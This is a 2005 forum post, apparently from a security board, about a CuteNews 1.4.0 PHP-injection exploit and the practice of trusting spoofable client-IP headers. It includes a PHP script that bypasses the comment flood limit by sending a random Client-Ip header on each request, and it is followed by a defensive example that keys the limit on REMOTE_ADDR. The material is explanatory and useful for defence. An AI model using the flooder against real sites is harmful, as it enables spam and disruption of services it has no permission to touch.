HTTP_NONO (cutenews exploit)
scip
Posted: 29.09.2005 06:29    Post subject: HTTP_NONO (cutenews exploit)

This has been around for a while now:
http://rgod.altervista.org/cutenews140.html
In short, it is supposedly possible to inject PHP code into /data/flood.db.php and then execute it with a plain request to that file .. at least that's what it says ..
Now, it's true that the exploit exists and the injection is possible, but the request to the file isn't. CuteNews ships with an .htaccess in the data folder that says 'Deny from all; Allow from 127.0.0.1', which means flood.db.php can't be requested from outside.
All of this also applies to CuteNews 1.3.6.

Never rely on HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR and the like, because that information is supplied by the browser and can easily be faked. REMOTE_ADDR is given to you by the server; stick with that. (It's harder to switch proxies than to change HTTP_CLIENT_IP :) )

Example (with a few changes this would be a CuteNews comment flooder):

Code:
<?php
// Target: the CuteNews page that shows the comments of one article
$url="http://127.0.0.1/cutenews.1.4.0/example1.php?subaction=showcomments&id=1127777629&archive=&start_from=&ucat=&";
// Form fields of a comment submission
$post="name=flooder&mail=&comments=flood&submit=Add+My+Comment&subaction=addcomment&ucat=&show=";

$url_info=parse_url($url);
$port = isset($url_info['port']) ? $url_info['port'] : 80;
$fp=fsockopen($url_info['host'], $port, $errno, $errstr, 30);

if($fp)
{
    // Raw HTTP POST assembled by hand
    $zahtjev = "POST ".@$url_info['path']."?".@$url_info['query']." HTTP/1.1\r\nHost: ".@$url_info['host']."\r\n";
    // The server sees this header as HTTP_CLIENT_IP; a different random value on every request
    $zahtjev .="Client-Ip: ".rand()."\r\n";
    $zahtjev .="Connection: Keep-Alive\r\n";
    $zahtjev .="Content-Type: application/x-www-form-urlencoded\r\n";
    $zahtjev .="Content-Length: ".strlen($post)."\r\n\r\n";
    $zahtjev .=$post;
    fputs($fp, $zahtjev);

    fclose($fp);
}
?>


P.S. that exploit wasn't written by a PHP person, because no self-respecting one would write:
# make these changes in php.ini if you have troubles with this script:
#register_globals = on
.. I mean, really ... :)

_________________
Let Your Bookmarks Define You ..
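An added example, not code from the original post or from CuteNews, showing the defender's side of the point made above: the client address is derived from REMOTE_ADDR, X-Forwarded-For is consulted only when the connection arrives from a reverse proxy under our own control, and the per-address flood window is keyed on that result, so a spoofed Client-Ip or X-Forwarded-For header changes nothing. The trusted-proxy list, the sample $_SERVER arrays and the in-memory stand-in for the flood database are constructed for the demo.

```php
<?php
// Added example (not from the original post or from CuteNews).
// Takes the client address from REMOTE_ADDR, which the web server fills in from the
// TCP connection, instead of from headers such as Client-Ip or X-Forwarded-For
// that any sender can set to an arbitrary value.

/**
 * Return the address to rate-limit or log for this request.
 *
 * $server         - the $_SERVER array (or a constructed copy, as in the demo below)
 * $trustedProxies - reverse proxies we operate ourselves (assumed list). Only when
 *                   REMOTE_ADDR is one of these is X-Forwarded-For consulted, and
 *                   then only the hop appended by that proxy is believed.
 */
function client_ip(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        // No usable socket address: refuse rather than fall back to a header.
        return '0.0.0.0';
    }

    // Direct connection (or a proxy we do not control): the socket peer is the client.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }

    // Connection came through our own proxy. Walk X-Forwarded-For from the right:
    // the rightmost entries were appended by trusted proxies, and the first address
    // that is not a trusted proxy is the real client. Anything further left was
    // supplied by the client itself and is ignored.
    $xff  = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    $hops = array_reverse(array_map('trim', explode(',', $xff)));
    foreach ($hops as $hop) {
        if ($hop === '' || filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // malformed chain: give up and fall back to the proxy address
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

/**
 * Per-address flood window, i.e. the check a comment flooder tries to get around.
 * $db maps address => timestamp of the last accepted post; here it is an in-memory
 * stand-in (constructed) for a flood database file. Returns true if the post may go ahead.
 */
function flood_allowed(array &$db, string $ip, int $now, int $window = 60): bool
{
    if (isset($db[$ip]) && ($now - $db[$ip]) < $window) {
        return false;
    }
    $db[$ip] = $now;
    return true;
}

// Constructed requests for the demo.
$trusted = ['10.0.0.5'];

// 1. Direct connection with a spoofed Client-Ip header (what the script above sends).
$direct = [
    'REMOTE_ADDR'    => '203.0.113.7',
    'HTTP_CLIENT_IP' => '1234567',
];
// 2. Same client, spoofing X-Forwarded-For instead.
$spoofedXff = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.1',
];
// 3. Request via our own reverse proxy; the client also prepended a fake entry.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.1, 203.0.113.7',
];

var_dump(client_ip($direct, $trusted)     === '203.0.113.7'); // bool(true): header ignored
var_dump(client_ip($spoofedXff, $trusted) === '203.0.113.7'); // bool(true): header ignored
var_dump(client_ip($viaProxy, $trusted)   === '203.0.113.7'); // bool(true): last untrusted hop

// Two posts from the same socket peer with different Client-Ip values still share
// one flood slot, so the second one within the window is rejected.
$floodDb = [];
$t = 1000;
var_dump(flood_allowed($floodDb, client_ip($direct, $trusted), $t));           // bool(true)
$direct['HTTP_CLIENT_IP'] = '7654321';
var_dump(flood_allowed($floodDb, client_ip($direct, $trusted), $t + 5));       // bool(false)
var_dump(flood_allowed($floodDb, client_ip($direct, $trusted), $t + 61));      // bool(true)
```

The only header-derived value ever used is the hop that a proxy we control appended to X-Forwarded-For; when REMOTE_ADDR is not one of our proxies, every forwarding header is ignored outright, which is exactly the rule the post recommends.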